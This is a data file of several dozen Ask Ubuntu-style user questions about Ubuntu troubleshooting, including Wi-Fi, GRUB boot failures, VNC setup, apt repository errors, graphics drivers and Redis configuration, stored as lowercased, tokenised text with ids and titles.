413376	wireless network problem in ubuntu 12.04 lts	my wifi network is not showing in the list . all my neighbours networks are showing up but not mine . my phone is connected to my wi-fi and its working fine . so right now i am connected by ethernet cable and its working fine . i am new to ubuntu and i have not installed windows . can anybody help me please ? after going to my isp website i have to refresh every time and then only does my wi-fi connection does gets established . so i have to do this every time i turn on my laptop . also , i have tried out some commands from a earlier question , this is the link : message on black screen during boot up ubuntu 12.04 lts
413379	can i install ubuntu with partition	so , last time i tried to install ubuntu from my usb but i ca n't , my disc is not enough memory so i decided to use rescatux to download ( i lost ubuntu so now my pc do n't have an os ) and copy it into a drive ( format : ext3 , hd0 , msdos1 , label ubuntu 13.10 ) and i ran super grub2 disk to boot by finding boot.cfg . after that the screen show the large text ubuntu , and i think i did it . but then it boot into ( initramfs ) with the messege : busybox v1.20.2 ( ubuntu 1:1.20.0-8ubuntu ) build-in shell ( ash ) enter 'help ' for a list of build-in commands . ( initramfs ) can not find a medium with a live file system . ( i 'm not sure the 3rd line with ( initramfs ) is correct because i remember it but i did not copy ) please help me , i really need an operating system but i do n't have an usb ( the last one i format it and the partition goes wrong ) and the disc it only have 700mb . the only way i can install it is using the partition . p/s : i do n't have anything in my drive .
413381	manually re-enable blurtooth	recently i found out that my bluetooth icon is on , but there are n't any options and in bluetooth settings it says it 's disabled.how can i solve this problem ?
413382	creating a debian package with external package dependencies	earlier i have created debian packages successfully , which were simple in their way . but now , i have to create the same for my application , which depends upon external packages . libwebkitgtk-1.0-0 and jdk1.7.0 are the external packages required . i want them to get installed automatically . also my software have certain data , which needs to be stored in user 's home directory . pls guide me on this .
413383	failed to install grub ubuntu 12.0.4	during the ubuntu 12.0.4 installation i have a failed to grub-install error . attemp to boot from hdd failed . i 'm read a numerous topics about grub installation failed error . i 'm boot from live cd and i 'm trying to execute in terminal the command sudo fdisk -l and sudo fdisk /dev/sda . i have the following fdisk : unable to seek on /dev/sda : invalid argument . i 'm execute sudo fdisk -l /dev/sdb . now i have disk /dev/sdb : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xbbc6bbc6 device boot start end blocks id system /dev/sdb1 63 976751999 488375968+ 7 hpfs/ntfs/exfat further i 'm execute sudo mount /dev/sdb1 /home/ubuntu and mount : /dev/sdb1 is not a block device is displayed . i 've /boot/grub non-empty directory on my local drive after ubuntu installation , but i do n't understand how to fix this problem and correctly load installed ubuntu from hdd .
413386	multiple users over vnc - lightdm	i 'm a student and i have access to a pretty powerful machine in the university lab . i 've been trying to allow my roommates to remotely login to my machine on an account that i 've created so that they can run some computationally intensive tasks . the idea is that their work will not interfere with mine while i 'm working physically on the machine . towards this , i modified /etc/lightdm/lightdm.conf to contain [ seatdefaults ] user-session=ubuntu greeter-session=unity-greeter autologin-user= [ xdmcpserver ] enabled=true port=177 # key= [ vncserver ] enabled=true port=5900 width=1920 height=1080 depth=16 and this automatically opens 5900 and grants a new login screen to each vnc session . however , upon logging in , all i get is an unusable desktop . keyboard commands like ctrl+alt+t do n't seem to work . i 'm able to use the mouse however , but i do n't get the unity launcher . when i right-click and goto change desktop background , i notice that the window seems to lack the maximize , minimize , close icons as well . i 'm not an expert at linux and am thus at a loss to better explain my predicament . any help would be greatly appreciated . edit : i modified greeter-session=lightdm-gtk-greeter and used gnome option instead of ubuntu and was able to achieve the desired results . however , i 've gotten really comfortable with unity and would like to know if it is possible to achieve the same with unity..
413387	ubuntu server 12.04 apt-get update errors ( 404 , w : failed to fetch ... )	i have a new instance of 12.04 server and have been having issues running sudo apt-get update the update seems to work fine then it will stop and sit waiting for headers then start spitting 404 errors . i have tried the following repos in my sources.list with precise and precise-updates etc . also defined to the same mirror : deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //uk.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse the 404 errors appear randomly sometimes stopping at get:100 , sometimes stopping at get:400+ i have now tried a whole different mirror ( mirrors.coreix.net ) and this seems to go on longer butafter already sometime it is now hanging waiting for headers . any ideas ? i have searched and searched the forum with many people experiencing similar issues , but nothing already here seems to assist me ... it may also be worth noting that this is on an corporate network and i currently have the network team checking if there is some sort of dns issue with our internal nameservers , but i can run host google.com and ping google.com and get an appropriate response with no lost packets or anything . edit : this is the last few lines from the last try that has just completed . get:450 http : //mirrors.coreix.net precise-security/main translation-en [ 168 kb ] get:451 http : //mirrors.coreix.net precise-security/multiverse translation-en [ 1,299 b ] get:452 http : //mirrors.coreix.net precise-security/restricted translation-en [ 1,253 b ] get:453 http : //mirrors.coreix.net precise-security/universe translation-en [ 56.3 kb ] get:454 http : //mirrors.coreix.net precise-updates/main amd64 packages [ 745 kb ] get:455 http : //mirrors.coreix.net precise-updates/universe amd64 packages [ 231 kb ] get:456 http : //mirrors.coreix.net precise-updates/main i386 packages [ 769 kb ] get:457 http : //mirrors.coreix.net precise-updates/universe i386 packages [ 236 kb ] get:458 http : //mirrors.coreix.net precise-updates/main translation-en [ 334 kb ] get:459 http : //mirrors.coreix.net precise-updates/multiverse translation-en [ 8,293 b ] get:460 http : //mirrors.coreix.net precise-updates/restricted translation-en [ 2,859 b ] get:461 http : //mirrors.coreix.net precise-updates/universe translation-en [ 135 kb ] err http : //mirrors.coreix.net precise-security/universe amd64 packages 404 not found err http : //mirrors.coreix.net precise-security/main i386 packages 404 not found err http : //mirrors.coreix.net precise-updates/main amd64 packages 404 not found err http : //mirrors.coreix.net precise-updates/universe amd64 packages 404 not found err http : //mirrors.coreix.net precise-updates/main i386 packages 404 not found err http : //mirrors.coreix.net precise-updates/universe i386 packages 404 not found get:462 http : //mirrors.coreix.net precise/main translation-en [ 726 kb ] get:463 http : //mirrors.coreix.net precise/multiverse translation-en [ 93.4 kb ] get:464 http : //mirrors.coreix.net precise/restricted translation-en [ 2,018 b ] get:465 http : //mirrors.coreix.net precise/universe translation-en [ 3,341 kb ] get:466 http : //mirrors.coreix.net precise-security/main translation-en [ 168 kb ] get:467 http : //mirrors.coreix.net precise-security/universe translation-en [ 56.3 kb ] get:468 http : //mirrors.coreix.net precise-updates/main translation-en [ 334 kb ] get:469 http : //mirrors.coreix.net precise-updates/multiverse translation-en [ 8,293 b ] get:470 http : //mirrors.coreix.net precise-updates/universe translation-en [ 135 kb ] err http : //mirrors.coreix.net precise/main translation-en connection failed get:471 http : //mirrors.coreix.net precise/multiverse translation-en [ 93.4 kb ] err http : //mirrors.coreix.net precise/multiverse translation-en connection failed err http : //mirrors.coreix.net precise/universe translation-en connection failed err http : //mirrors.coreix.net precise-security/main translation-en connection failed get:472 http : //mirrors.coreix.net precise-security/universe translation-en [ 56.3 kb ] err http : //mirrors.coreix.net precise-security/universe translation-en connection failed err http : //mirrors.coreix.net precise-updates/main translation-en connection failed get:473 http : //mirrors.coreix.net precise-updates/universe translation-en [ 135 kb ] err http : //mirrors.coreix.net precise-updates/universe translation-en connection failed fetched 12.8 mb in 1h 39min 45s ( 2,143 b/s ) w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-security/universe/binary-amd64/packages 404 not found w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-security/main/binary-i386/packages 404 not found w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-updates/main/binary-amd64/packages 404 not found w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-updates/universe/binary-amd64/packages 404 not found w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-updates/main/binary-i386/packages 404 not found w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-updates/universe/binary-i386/packages 404 not found w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise/main/i18n/translation-en connection failed w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise/multiverse/i18n/translation-en connection failed w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise/universe/i18n/translation-en connection failed w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-security/main/i18n/translation-en connection failed w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-security/universe/i18n/translation-en connection failed w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-updates/main/i18n/translation-en connection failed w : failed to fetch gzip : /var/lib/apt/lists/partial/mirrors.coreix.net_ubuntu_dists_precise-updates_multiverse_i18n_translation-en encountered a section with no package : header w : failed to fetch http : //mirrors.coreix.net/ubuntu/dists/precise-updates/universe/i18n/translation-en connection failed e : some index files failed to download . they have been ignored , or old ones used instead . admin @ snoap01 : /etc $
413391	tightvnc is not working properly..its showing grey background with x cursor	i am running ubuntu suacy 13.10 over android galaxy s3 using linux deploy but tightvnc not working properly ... .its showing grey background with x cursor ... guide me please ... ! ! xstartup configuration : xauthority= $ home/.xauthority export xauthority lang=en_us.utf-8 export lang echo $ $ > /tmp/xsession.pid xkl_xmodmap_disable=1 export xkl_xmodmap_disable if [ -n `` `gnome-session -h | grep `` \-\-session '' ` '' ] ; then gnome-session -- session=gnome else gnome-session fi kindly help ... ! ! thanks
413398	what are the differences between -v an -v to get the version of software in ubuntu ?	i 'm always confused to get the version of software installed in ubuntu . to prevent from full typing to get the version like < software > -- version instead i always use some thing like < software > -v. but the problem is that not for all software it works . for some i 've to use < software > -v and for some i 've to use full -- version to get the version . for example wget , gedit , nano , mysql etc all works with -v ( capital v ) but php , skype and may be others never worked with -v instead i 've to use -v ( small v ) to get the version : php -v usage : php [ options ] [ -f ] < file > [ -- ] [ args ... ] php [ options ] -r < code > [ -- ] [ args ... ] php [ options ] [ -b < begin_code > ] -r < code > [ -e < end_code > ] [ -- ] [ args ... ] php [ options ] [ -b < begin_code > ] -f < file > [ -e < end_code > ] [ -- ] [ args ... ] ... php -v php 5.3.10-1ubuntu3.9 with suhosin-patch ( cli ) ( built : dec 12 2013 04:27:25 ) ... some work with both -v and -v like firefox . and some even do n't work with either of -v or -v like totem , wine and google-chrome . why there is this much difference ? since -v is always preferred to get the version of software , why there is no any standard ? or is there any standard that i do n't know ?
413404	ctrl+alt+f1 - incorrect login	i have pressed the keyboard combination ctrl+alt+f1 , because i wanted to see the output of my commands as they were being executed , but i got the following error : incorrect login .
413405	cant install wine	have problem to install wine 1.6 or 1.7 doesn`t matter . the following packages have unmet dependencies : wine1.6 : depends : wine1.6-i386 ( = 1:1.6.1-0ubuntu1~ppa1 ) e : unable to correct problems , you have held broken packages . the following packages have unmet dependencies : wine1.7 : depends : wine1.7-i386 ( = 1:1.7.11-0ubuntu1~saucy1 ) e : unable to correct problems , you have held broken packages . before i reinstalled ubuntu all was ok . i have tried a lot advises but nothing helps .
413407	windows 7 wo n't boot after installing ubuntu 12.04	i 'm having a pretty serious problem right now that i hope someone can help me with . i ca n't seem to load windows 7 . i just started and set up a dual boot of windows 7 and ubuntu . my windows was working fine before installing ubuntu . however now whenever i select the windows loader option in the grub menu it wo n't work . it will appear like its starting to load but then after a few minutes it will take me to the startup repair screen ( i think that 's what its called ) . after several minutes of waiting it says that it ca n't repair it and suggests using the system repair disc ... which i do n't have . i 've have searched and tried several different `` solutions '' to no success . is there a way i can create a system repair disc using a usb drive from ubuntu ? ? does n't seem possible to me . or could it be that grub is n't loading windows 7 correctly ? is there anyway i can just bypass grub ? or not use it at all . maybe what i 'm trying to ask is can i boot windows 7 directly from the bios menu or something ? i wish i never had even considered dual booting and should have just stuck to a virtual machine . can anyone help ? ?
413412	my ubuntu takes too long to boot	a couple of days ago my laptop using ubuntu 12.04 started to take too long to boot , this is the result of dmesg ( see the gap of 80 seconds ) . [ 3.133840 ] hub 2-1:1.0 : usb hub found [ 3.133937 ] hub 2-1:1.0 : 6 ports detected [ 3.177197 ] refined tsc clocksource calibration : 2195.013 mhz . [ 3.177207 ] switching to clocksource tsc [ 3.205394 ] usb 1-1.2 : new high-speed usb device number 3 using ehci_hcd [ 3.497042 ] firewire_core : created device fw0 : guid 08004603035a576e , s400 [ 3.948491 ] ext4-fs ( sda8 ) : mounted filesystem with ordered data mode . opts ( null ) [ 84.515225 ] adding 15624188k swap on /dev/sda7 . priority : -1 extents:1 across:15624188k [ 84.834774 ] addrconf ( netdev_up ) : eth0 : link is not ready [ 84.858846 ] udevd [ 566 ] : starting version 175 [ 85.022971 ] lp : driver loaded but no devices found [ 85.023321 ] ext4-fs ( sda8 ) : re-mounted . opts : errors=remount-ro [ 85.521633 ] [ firmware bug ] : acpi ( ngfx ) defines _dod but not _dos [ 85.533717 ] wmi : mapper loaded [ 85.543947 ] acpi device:20 : registered as cooling_device8 [ 85.559778 ] acpi device:21 : registered as cooling_device9 [ 85.559849 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/device:1f/lnxvideo:00/input/input3 what could be the problem ? and how to fix it ?
413415	install ssba in ubuntu 12.04	i am trying to install ssba-3.0 in ubuntu and i am having problems . at first i was having issues like : xxx/ssba-3.0/math/v3d_nonlinlsq.cpp:6:21 : fatal error : colamd.h : no such file or directory which i solved by manually downloading the header files . now i am stuck here : /usr/bin/ld : can not find -lcolamd i have downloaded and installed sparsesuite with cmake and make but it did n't help . i am relatively new to linux so i would really appreciate your help .
413416	java -jar runs via shellscript but not via cron	i have a shell script that i want to schedule via cron to be ran every 10 minutes . the shellscript runs a jar file . if i run the shellscript via ./sensorrreader.sh it works just fine ( creates a file ) but when i schedule the job in cron it runs but no file is created , so something goes wrong ... any suggestions what might be the error ? ( in simple words please , im learning linux/unix commands : - ) ) this is the contents of the sensorreader.sh file : # ! /bin/sh source /ffp/etc/profile.d export java_home=/ffp/opt/java/jre/bin/java export path= $ path : /ffp/opt/java/jre/bin /ffp/opt/java/jre/bin/java -jar /mnt/hd/hd_a2/nigge/sensorreader/sensorreader.jar and this is the row in crontab : */10 * * * * /mnt/hd/hd_a2/nigge/sensorreader/sensorreader.sh any suggestions what might be wrong ?
413417	my installer crashed while installing ubuntu on to my laptop	my installer crashed while installing ubuntu on to my laptop , i received a messages saying that i can file a bug report using the integrated bug reporting tool . i attempted to close the window in order for the reporting tool to open however ; i can not get the window to close . what is the next step in order to properly install the ubuntu software
413418	problems with extended attributes limits in linux kernel + xfs when making a rsync backup for os x computers	if i understands it correctly xfs do n't have a limit to the size of extended attributes ( ea ) but linux kernel impose a limit at 64k ? what i am trying to do is build a backup server that our apple computers will use together with rsync to backup files to . the problem that i face is that apple hfs+ do n't have a limit to ea so it has files with more then 64k of ea in it . the linux kernel has a limit imposed to it in include/linux/limits.h # define xattr_size_max 65536 /* size of an extended attribute value ( 64k ) */ # define xattr_list_max 65536 /* size of extended attribute namelist ( 64k ) */ changing this values feels unsafe because they will be system wide and i use ext4 also in this server . is the any possibility to combine linux + xfs to make a backup that works with ea ? thanks .
413425	cpu usage over 20 % on all cores fom compiz , xorg , and at-spi2-registr	i noticed that on all 6 cores on my processor my computer is using 20-60 % . no windows were open aside from the system monitor . i ran the command `` top '' in terminal and found that compiz is using 60-130 % , xorg 15-70 % , and at-spi2-register pretty consistently 16 % ( this all occurring with only firefox and the askubuntu.com webpage open ) . i have also noticed that when i click the dash button ( `` search your computer and online resources '' ) when the computer is initially starting up , it will boot me right back to the desktop for the first 2-3 minutes after starting up . things i 've done that might contribute to some of my problems include installing java sdk 7u51 , trying to use a proprietary driver for an amd radeon hd 7970 , and trying to run bfgminer on my computer for fun/learning/experimentation . any thoughts as to what i can do to get my cpu to calm down ? it should n't be running this much hotter than my windows drive , in my opinion ...
413427	ubuntu can not be booted from external hard disk on another computer	i have recently installed ubuntu 13.10 on a external hard disk by using a windows 8 laptop . i wanted it to be accessible from any other computers . but i found that there were 2 `` ubuntu '' s at the boot manager screen even the external hard disk was not connected . seems it is recognized as dual-boot . later , i tried to boot it from another computer ( windows 7 desktop ) . the ubuntu 13.10 inside can not be loaded . i ca n't find any other solutions , so i post it here . hoping somebody can help me out . p/s : both the partition and the swap area are set as primary drive .
413428	laptop shuts down due to overheating	i have a hp g6-2201 ax laptop.i recently installed ubuntu 13.04 like 1 day ago and my laptop is heating more than usual.yesterday it shut down twice due to overheating.please suggest me what to do.i have dual amd graphics and shut down one graphics , but still it reaches around 75 degrees.suggest me some apps that deal with overheating ( other than jupiter cos its gone now ) . configuration . amd a8 processor , dual amd graphics and its been just 4 moths since i bought my laptop .
413431	cloning and partitioning	i am trying to turn some partitions into extended so that i can install windows as i am trying to learn asp.net ( as i can not exceed 4 primary partitions ) . i am thinking of : -- > cloning /home and / ( root ) using gparted to another intermediate drive . -- > delete both of them , and format one of them as extended/logical . -- > then clone them back , so that i will have room for one more primary ( or even a partition at all ) my questions is : will it work , without me having to touch fstab and other boot stuff ? does it matter if clone size is slightly different ? thank you .
413434	why is the size of update manager different from time to time ?	at the first time , i installed ubuntu 12.04 on my desktop and ran the update manager . at that time , the size of the update is about 168 mb . then i did something wrong on device installation , so i decided to re-install ubuntu by erasing the previous one . but what i noticed was that when i ran the update manager on the new ubuntu , the total size of the update is now about 100mb , not 168mb . so now i am wondering if there 's something broken on the last installation , because the size of the update is smaller than the previous one 's ... please tell me whether this is a fault at installation or i can ignore this and proceed thank you ===================================================================== ok . this is not a fault . i did three installations on the same machine , all without internet connection , and then later ran the update manager . then the size of the update was identical for every installation . it looks like sometimes , updates during installation from internet differ from time to time , but as a whole , there is nothing wrong with it .
413436	copy current terminal prompt to clipboard	is there a way to copy the currently written content of the bash prompt ? say i wrote : ping www.google.com so that the lines in terminal looks like : petr @ sova : ~ $ ping www.google.com and did n't hit return yet . i want to copy that text to clipboard . is that possible ? the usual usecase would be hitting up several times and finding a command which i want to copy .
413438	no mobile data on nexus 4 ubuntu touch	i 've installed 29/01/2014 ubuntu touch on my nexus 4 ( with .84 radio from android 4.3 ) . i can make/receive calls and connect to wifi but when i turn wifi off i see a 3g icon flash up two or three times in the top bar but then just the `` no connection '' icon . there is definitely no data connection . i understood that this should be working without any user intervention . my imei shows up in `` about '' , mobile data is set to `` on '' and my carrier is correctly identified as `` o2 uk '' . can anyone please point me in the right direction ? btw i already tried creating a mobile data connection in desktop and then copying to `` /etc/networkmanager/system-connections '' and bringing up with `` nmcli con up id '' etc but i got the error that the connection was not supported by ofono . thank you
413439	are key files for repositories fetched over https ?	i 'm connecting to the internet through a public internet connection . i want to know if some one can do a mitm attack and give wrong keyfiles when i update and upgrade . the difference here would be http or https . if they are fetched over http then an attacker can easily change a keyfile and give a malicious deb . p.s : no tips on getting a better connection .
413442	desktop icons appear on wrong monitor	i have a laptop with xubuntu 13.10 and to the right of the laptop is a monitor located . the monitor is the primary : i set the option `` primary '' in the settings editor ( http : //www.ubuntubuzz.com/2011/12/how-to-dual-monitor-setup-on-xfce.html ) and i use this setting : xrandr -- output hdmi1 -- primary -- right-of lvds1 ( hdmi1 is the monitor as you might have guessed ) most of the dual-monitor-setup is fine : my menu-borders appear on the monitor and all programs also start on the monitor . my problem are the desktop-icons : when i save a new file ( e.g . an image in the browser ) to the desktop , it appears on the far left of the laptop and i have to drag it on the monitor . and when i rename an icon , that is on the monitor , it jumps to the far left side of the laptop . and what 's even more annoying : every two or three days ( must be some kind of race-condition ) when i start the laptop the icons which are carefully arranged on the monitor appear all on the left side of the laptop in one vertical line and i have to drag them back and re-arrange them . is there another option/ setting where i can set which is the primary monitor , so that the desktop-icons also realize where they are supposed to appear ? how can i prevent the random icon-moving at the start of the system ?
413444	is is safe to let ubuntu resize my windows partition during installation ?	i have a hp pavilion 15-n077so laptop with windows 8.1 . i want to keep windows but i want also install ubuntu . i think this is uefi laptop , so is there anything to take care about before installation ? this machine has one 1tb hard drive with one partition so i should somehow give some space to ubuntu . can i let ubuntu installation make partitions safely ?
413445	sound disappeared after trip , wo n't work without pulse	i had sound working fine on an acer aspire 7250 up until this week , when i took a flight . now , sound worked only intermittently , and only through headphones . since i 've had many problems with pulseaudio and audacious before , i removed pulseaudio . now , the system does not even see the sound device , despite that alsamixer and qasmixer both do . so : how do i get ubuntu sound working , without pulseaudio installed ? i 'm using 13.10 , my main wm is enlightenment . thanks , ee
413448	how to download the latest i8kutils package and install it properly ?	my laptop is dell inspiron se 7520 , ubuntu 13.10 . i learned that i8kutils is an awesome tool to control the fan speed automatically ( the fan speed issue frustrates me tremendously ) . i need to be able to do the following : configure it properly ( it does n't start when ubuntu starts ) understand it 's configurations ( i think i only have one fan , i need to know how to configure based on that ) how to know if i have more than one fan ? ! i need to install the latest version ( 1.39 for saucy/13.10 ) , while when i run it , it shows it 's version as 1.27 ! i also have an ati radeon hd 7730m graphics card , how to know if this one has a fan too ? !
413449	ubuntu 13.10 wireshark crashes at start of capture with segfault unless ran as root	wireshark has always worked without issue for me , but upon using it on 13.10 i find that as soon as i start a live capture it does nothing , the screen dims , then it crashes . syslog shows : wireshark [ 5616 ] : segfault at 7fffbc3a3ff8 ip 00007fa83f334284 sp 00007fffbc3a3ff0 error 6 in libgobject-2.0.so.0.3800.1 [ 7fa83f324000+4f000 ] if i run wireshark as root , this segfault does not seem to happen . in the past i have always followed the steps here to set various permissions and capabilities to allow wireshark to run as normal user . do these need to change for 13.10 ? my wireshark version is from the repos : wireshark 1.10.2 ( svn rev 51934 from /trunk-1.10 ) anyone know how to resolve this ?
413450	how to enable administrator using guest	i mistakenly disabled my administrator account in ubuntu 12 . now all my documents are locked . i have tried entering the password but it 's responding with `` invalid password '' . i 'm only able to login using the guest account . how can i re-enable my administrator account ?
413451	problem installing libxplc package on ubuntu 13.10	i am trying to install the libxplc package using sudo apt-get install libxplc but getting message unable to locate package libxplc , please tell me what should i do .
413452	thunderbird mark as read possibility in new mail popup ( notification )	i mean this : is there a thunderbird plugin , that would add button for marking message as read to this popup ? right now you have to : bring thunderbird window to the top choose the account that the message was delivered to find the message and mark it as read minimalize tunderbird window
413454	4gb installed , but 3gb read on ubuntu server 10.04 lts 64	i have 4gb of memory installed , but only 3gb seems to be usable . how can i resolve this ? processor : intel ( r ) pentium ( r ) dual cpu e2200 @ 2.20ghz root @ ubuntu77 : ~ # uname -a linux ubuntu77 2.6.32-55-server # 117-ubuntu smp x86_64 gnu/linux root @ ubuntu77 : ~ # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 10.04.4 lts release : 10.04 codename : lucid root @ ubuntu77 : ~ # free -m total used free shared buffers cached mem : 3268 2689 578 0 141 2085 -/+ buffers/cache : 462 2805 swap : 759 0 759 root @ ubuntu77 : ~ # sudo python check-my-memory.py check-my-memory.py - version : sj 2013-02-22 ok , you 're root analysis : total of physical memory modules found 4096 mb in 2 memory module ( s ) bios offers 3324 mb as usable bios offers 3324 mb as 'modified ' usable memory seen by os 3268 mb bios version 02/09/2009 cpu is pae enabled cpu is x86_64 64-bit enabled os is x86_64 64-bit summary : memory difference between dimm hardware and bios offering 772 mb memory difference between bios offering and memory seen by os 56 mb memory difference between dimm hardware and memory seen by os 828 mb advice : your bios is not offering all of your physical memory . try to update your bios , and/or enable 'memory hole remapping / hoisting ' in your bios to get more usable memory finally : show more detailed memory info from lshw . this can take up to 30 seconds ... description : system memory size : 4gib description : dimm sdram synchronous size : 2gib description : dimm [ empty ] description : dimm sdram synchronous size : 2gib description : dimm [ empty ]
413455	can i use ubuntu as a network drive for windows 8.1 file history ?	i want to install ubuntu on an old hp mini , place it next to and connect it to my tv and use it as a file and media server . i also want to use it for backup , using the new file history feature in windows 8 and 8.1 . can i use ubuntu as a remote drive . i was n't able to find an official document from microsoft saying which file systems file history supports ? has anyone tried this ?
413456	unable to configure port in redis database	i am trying to configure the ports in redis database . i have changed the port number to 7778 in the redis.conf file . this file is in /etc/redis.conf and i 'm using this command redis-server /etc/redis.conf and this goes through . i 'm able to get through . however if i execute this command redis-cli or redis-cli /etc/redis.conf i 'm getting this error could not connect to redis at 127.0.0.1:6379 : connection refused . i then tried this command redis-cli -p 7778 127.0.0.1 > ping ( error ) noauth authentication required
413457	how can i enable nlm ( network lock manager ) on ubuntu ?	i have used ubuntu 12.04 version.i have installed nfsv3 and 4 . could you please help me to enable the nlm on ubuntu ? thanks , narottam
413458	unknow filesystem type 'isw_raid_member '	i 'm booting from live cd and trying to mount /dev/sda . after executing sudo mount /dev/sda /mnt the mount : unknow filesystem type 'isw_raid_member ' is displayed . how to fix this ? what means this error message ?
413462	how to prevent two monitors merging together ?	i have a strange problem . my computer setup is not common , i have 2 gpus , amd 's 5850 and 7790 . i also have 2 displays : 22 '' and 24 '' , which are both connected in the 7790 card . everything was ok before i add the 5850 . when i did it , i had to configure it in the catalyst control center ( ccc ) . it was displayed as the second device . i enabled it and rebooted my computer . now it 's being quite annoying . the two monitors started acting as one ( e.g . when i maximize a window , it maximizes over the two screens ) . this is not what i want . i have been playing with the settings in ccc , but it did n't bring me the right results . there was no option to treat the displays like two . when i tried xinerama , xorg failed to load and i had to disable it manually in xorg.conf . when i disabled the second gpu , the screens were ok , but the gpu was not working , obviously . so i need the two gpus working and also the two screens behave as two screens ( extended , not mirrored ) , not as one big screen . something useful for you : xorg.conf image ( sorry , i do n't have reputation to post them here -_- ) : i appreciate your help , i did everything i know and did n't googled anything useful . thank you . edit : xrandr -q output : http : //pastebin.com/q4g86ymq however , i tried multiple desktop environments and everything works perfectly in unity ( what irony ) . previously tried gnome 3 , pantheon , xfce , fluxbox
413463	problems with instalation of zend-framework	when i type this command : apt-get install zend-framework i am getting this error : dpkg : error processing zend-framework ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : php5-common php5-cli libapache2-mod-php5 php5-curl php5-gd php5-intl php5-mysql php5-pspell php5-recode php5-snmp php5-sqlite php5-tidy php5-xmlrpc php5-xsl php-pear php5 libzend-framework-php zend-framework-bin zend-framework e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i have already install apache2 , php5 and mysql on my ubuntu 12.10
413464	stuck at grub rescue > after deleting ubuntu 13.10 from windows 8	i have deleted ubuntu 13.10 from windows 8 disk management and extended a drive using that freed space ... after doing that when i restarted my laptop i got stuck at grub rescue and not able to boot to windows 8 ..neither i can open the bios section.. any help would be appreciated
413467	want to install ubuntu and keep ms word	i have win xp sp3 and two hd partitions : c - 30gb - installed windows and applications - 11gb free d - 46gb - my documents - 34gb free i want to install ubuntu , but i 'm rather confused what is the best solution for me : i preffer to use linux for all my jobs , but the only reason i need to keep windows is ms word 2010 . i often send docx . files to my school , and they must be strictly formatted on their win-comps . if i understand well ( on some forums ) - it 's not possible with save as docx command in linux text application . i already downloaded installation files - ubuntu-13.10-desktop-i386.iso . important : dvd rom is not in function , but usb stick ( about 2gb ) works . should i create a new partition for ubuntu ? or instal it on c or d partition ? i would be happy with a separate partition for os , another one for applications , and third one for documents . is it possible to switch between two os by click , without rebooting comp ? is there any downside according using gmail and skype ? if someone could resolve these dilemmas and write some step by step instructions . thanks in advance .
413469	usb audio manhattan 150859 noised sound	i have bought this external audio card , manhattan 150859 and the sound has white noise , even if i turn off the mic . the volume is always very high and difficult to manage . any idea ?
413470	failed to install nvidia driver on ubuntu 13.10	i 've run an update and upgrade after i rebooted . when i did that i realised that the nvidia driver is n't there anymore . i 've tried everything i know from : sudo apt-get -- reinstall nvidia-current-update to sudo apt-get purge nvidia* then reinstalled it in vain as i keep getting the error sudo apt-get install nvidia-current here 's my sources.list : # deb cdrom : [ ubuntu 13.10 _saucy salamander_ - release i386 ( 20131016.1 ) ] / saucy main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //tn.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src http : //tn.archive.ubuntu.com/ubuntu/ saucy main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //tn.archive.ubuntu.com/ubuntu/ saucy-updates main restricted deb-src http : //tn.archive.ubuntu.com/ubuntu/ saucy-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //tn.archive.ubuntu.com/ubuntu/ saucy universe deb-src http : //tn.archive.ubuntu.com/ubuntu/ saucy universe deb http : //tn.archive.ubuntu.com/ubuntu/ saucy-updates universe deb-src http : //tn.archive.ubuntu.com/ubuntu/ saucy-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //tn.archive.ubuntu.com/ubuntu/ saucy multiverse deb-src http : //tn.archive.ubuntu.com/ubuntu/ saucy multiverse deb http : //tn.archive.ubuntu.com/ubuntu/ saucy-updates multiverse deb-src http : //tn.archive.ubuntu.com/ubuntu/ saucy-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //tn.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb-src http : //tn.archive.ubuntu.com/ubuntu/ saucy-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu saucy-security main restricted deb-src http : //security.ubuntu.com/ubuntu saucy-security main restricted deb http : //security.ubuntu.com/ubuntu saucy-security universe deb-src http : //security.ubuntu.com/ubuntu saucy-security universe deb http : //security.ubuntu.com/ubuntu saucy-security multiverse deb-src http : //security.ubuntu.com/ubuntu saucy-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu saucy partner # deb-src http : //archive.canonical.com/ubuntu saucy partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # deb http : //extras.ubuntu.com/ubuntu saucy main deb http : //archive.canonical.com/ saucy partner # 